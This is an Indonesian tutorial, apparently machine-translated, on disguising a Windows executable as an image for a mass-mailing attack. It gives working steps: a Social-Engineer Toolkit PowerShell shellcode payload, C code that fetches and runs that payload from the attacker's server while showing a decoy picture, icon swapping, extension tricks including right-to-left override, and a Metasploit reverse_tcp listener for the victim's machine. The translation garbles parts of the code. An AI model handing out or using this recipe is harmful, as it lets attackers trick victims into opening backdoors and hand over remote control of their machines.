Cara Menyembunyikan Virus Dari Dalam Gambar Palsu

Dalam tutorial ini kita akan berbicara tentang menciptakan virus dalam dokumen Word di skenario serangan massal mailer. Bagaimanapun akan mencakup dalam menciptakan citra palsu atau screenshot dengan backdoor meterpreter tersembunyi yang akan digunakan dalam skenario yang sama.

Langkah 1: Membuat Virus

Kita akan menggunakan teknik yang sama yang digunakan tutorial ini ... tapi dengan sedikit twist. Kami akan membuat executable juga membuka gambar yang kita pilih.

Bagian I: Menciptakan Payload Powershell

Kami akan menggunakan Teknik Toolkit Sosial untuk membuat payload PowerShell kami. Untuk membukanya, ketik ini di konsol:

setoolkit

Dari sana, tipe 1 untuk "serangan rekayasa sosial", kemudian 9 untuk "vektor serangan PowerShell", dan akhirnya 1 untuk "PowerShell shellcode injector alfanumerik".

Sekarang, Anda harus memberikan "LHOST". Jika Anda sudah tahu, ini adalah alamat IP lokal mesin penyerang Anda (asalkan Anda menyerang melalui jaringan area lokal). Untuk menentukan itu, membuka jendela terminal baru dan ketik:

ifconfig

Gulir ke atas untuk menemukan antarmuka yang terhubung ke jaringan Anda ("eth0"). Cari apa yang saya disorot, "inet", dan di samping itu Anda akan menemukan alamat IP lokal Anda (10.0.0.13). Ini adalah apa yang Anda akan masukan untuk LHOST Anda.

Selanjutnya, akan meminta Anda untuk mengetik dalam "port untuk sebaliknya". Ini mengacu pada "LPORT". Biasanya, kami menggunakan "4444" seperti itu konvensi meterpreter, tetapi Anda dapat menggunakan port yang Anda inginkan selama Anda ingat.

Maka ia akan meminta Anda jika Anda ingin "memulai sekarang". Ketik "tidak", kami akan melakukannya secara manual nanti. Untuk saat ini kita sudah selesai dengan SET.

Sekarang kita harus memindahkan muatan ke webserver apache. Untuk melakukannya, buka terminal dan ketik:

mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/html/payload.txt

Namun, jika Anda masih menggunakan Kali Linux 1 (tidak 2), gunakan perintah ini:

mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/payload.txt

Karena di Kali Linux versi 2, direktori apache akar dipindahkan ke folder "html" di dalam / var / www /.

Kami juga perlu gambar yang sebenarnya untuk menampilkan kepada pengguna kami ketika mereka menjalankan file. Saya akan menggunakan satu ini:

Image via quickmeme.com

Simpan ini sebagai screenshot.jpg di folder apache webserver Anda (/ var / www di Kali 1 dan / var / www /html di Kali 2). Kami akan menggunakannya nanti. Sekarang, cukup ketik:

layanan apache2 start ... Dan webserver Anda harus mulai.

Bagian II: Menciptakan Executable

Untuk membuat virus, kami menggunakan jendela notepad dan MinGW ini "gcc". Kode untuk virus adalah sebagai berikut:

#include utama() { sistem ( "w powershell.exe tersembunyi -c (baru-objek System.Net.WebClient) .Downloadfile ( 'http://10.0.0.13/ screenshot.jpg', 'C: \\ Pengguna \\ Umum \\ screenshot .jpg ') & mulai C: \\ Pengguna \\ Umum \\ screenshot.jpg & powershell.exe \ "IEX ((baru-objek net.webclient) .downloadstring (' http://10.0.0.13/payload.txt ')) \ ""); return 0; }

Kode Executable - Link Pastebin

Ingatlah untuk mengubah "10.0.0.13", sebagai LHOST Anda (atau alamat IP lokal) kemungkinan akan berbeda.

Jika Anda membaca tutorial pertama, Anda mungkin melihat kode menambahkan: powershell.exe w disembunyikan -c (baru-objek System.Net.WebClient) .Downloadfile ( 'http://10.0.0.13/screenshot.jpg', ' C: \\ Pengguna \\ Umum \\ screenshot.jpg ') & mulai C: \\ Pengguna \\ Umum \\ screenshot.jpg

Download gambar dari server dan membukanya di penampil gambar default, sehingga setelah virus dibuka, itu tidak menimbulkan kecurigaan apapun.

Simpan ini sebagai "evil.c", kemudian compile menggunakan c compiler favorit Anda. Kami biasa menggunakan gcc, jadi ketik:

gcc.exe D: \ Hacking \ evil.c -o D: \ Hacking \ evil.exe

Sekarang kita memiliki eksekusi yang baik untuk download dan membuka dan gambar, dan menjalankan payload jahat!

Langkah 2: Membuat 'the executable' Seperti Gambar

Pertama kita akan membuat executable "terlihat" seperti gambar. Saat ini, ikon untuk itu adalah default:

Ini tidak akan menipu siapa pun. Mari kita mengubah itu. Kita akan mengkonversi gambar screenshot.jpg menjadi ikon. Untuk melakukan itu, kami hanya akan menggunakan converter secara online .

Sekarang kami pergi dengan file icon yang cocok dengan gambar yang dieksekusi akan terbuka. Kami akan menggunakan Resource Hacker untuk mengatur ikon dieksekusi untuk itu.

Pertama, hacker sumber daya terbuka dan klik File -> Open

Dari sana, pilih executable yang kami buat pada langkah satu. Sekarang klik tombol Add Binary atau Sumber Daya Gambar dan pilih file .ico kami.

Akhirnya, klik Tambahkan Referensi dan Simpan.

Sekarang executable kami terlihat lebih meyakinkan ...

Namun dilakukan belum cukup.

Langkah 3: Mengganti nama Executable

Bagian terakhir dari membuat virus kami tampak seperti gambar yang sebenarnya adalah mengubah namanya. Jika pengguna melihat ekstensi .exe, mereka hampir pasti tidak membukanya. Jadi, kita akan menggunakan beberapa teknik untuk memperbaiki ini.

Kemungkinan I: The Classic ".jpg.exe"

Secara default, windows menyembunyikan ekstensi file yang dikenal. Pengaturan seperti ini:

Mungkin untuk lolos dengan mengubah nama executable untuk "evil.jpg.exe", dan mungkin menipu mayoritas pengguna. Untuk pengguna yang tidak mengubah pengaturan, eksekusi kami akan terlihat seperti ini:

Kemungkinan II: Screenshot.scr

Kemungkinan yang mungkin bekerja di sebagian besar kasus, tetapi kita tidak bisa selalu mengandalkan korban tidak memiliki berubah pengaturan mereka. Jadi, kemungkinan lain adalah mengubah ekstensi dari ".exe" untuk "scr".

Jangan khawatir meskipun, ekstensi scr berjalan dengan cara yang persis sama seperti .exe dan tidak akan merusak virus. Perbedaannya adalah bahwa kita dapat menipu korban kita untuk berpikir bahwa scr berarti file tersebut screenshot.

Kemungkinan III: Unitrix

Unitrix sebenarnya adalah nama dari virus pertama kali terlihat di alam liar. Itu diberi nama karena cara itu korban tertipu ke dalam pemikiran itu tidak dapat dieksekusi. Virus Unitrix digunakan Kanan-ke-Kiri karakter Override yang (RLO) sehingga pengguna akan melihat sesuatu seperti "exe.jpg" saat sistem akan melihat "gpj.exe" dengan karakter unicode di depan. Dengan demikian, jika menggunakan menggunakan ini, kita bisa mengelabui korban yang tidak akan jatuh selama dua kemungkinan sebelumnya. Berikut ini contohnya:

Pertama, klik kanan pada executable Anda dan klik 'Rename'. Kemudian, ketik "agpj.scr geometris"

Tempatkan kursor Anda sebelum gpj, klik kanan, dan membawa lebih dari "Insert Unicode Kontrol Karakter"

Pilih "Start dari kanan-ke-kiri override" dan nama sekarang harus membaca "arcs.jpg geometris"

Bonus: Teknik ini kadang-kadang tertangkap oleh antivirus karena bahkan tanpa tanda tangan untuk dieksekusi Anda, beberapa AV ini mungkin otomatis melaporkannya sebagai berbahaya karena itu yang bersifat RLO dalam namanya.

Langkah 4: Menyiapkan Pendengar yang

Terakhir, kita perlu menyiapkan pendengar menunggu untuk sesi meterpreter. Jalankan kerangka metasploit dengan mengetik:

msfconsole

Setelah itu beban, ketik:

menggunakan multi / handler

Sekarang, Anda akan perlu mengetikkan serangkaian pilihan untuk Anda:

• set payload windows / meterpreter / reverse_tcp

• set LHOST 10.0.0.13

• set LPORT 4444

Sekali lagi, ingat untuk mengubah LHOST ke alamat IP lokal Anda, dan mengubah LPORT jika Anda menggunakan sesuatu selain 4444.

Akhirnya, ketik "mengeksploitasi" dan tekan enter untuk memulai pendengar. Begitu korban menjalankan executable kami, gambaran kita akan diunduh dan dibuka di penampil gambar default, payload berbahaya kami akan dieksekusi, dan kami akan mendapatkan sesi meterpreter.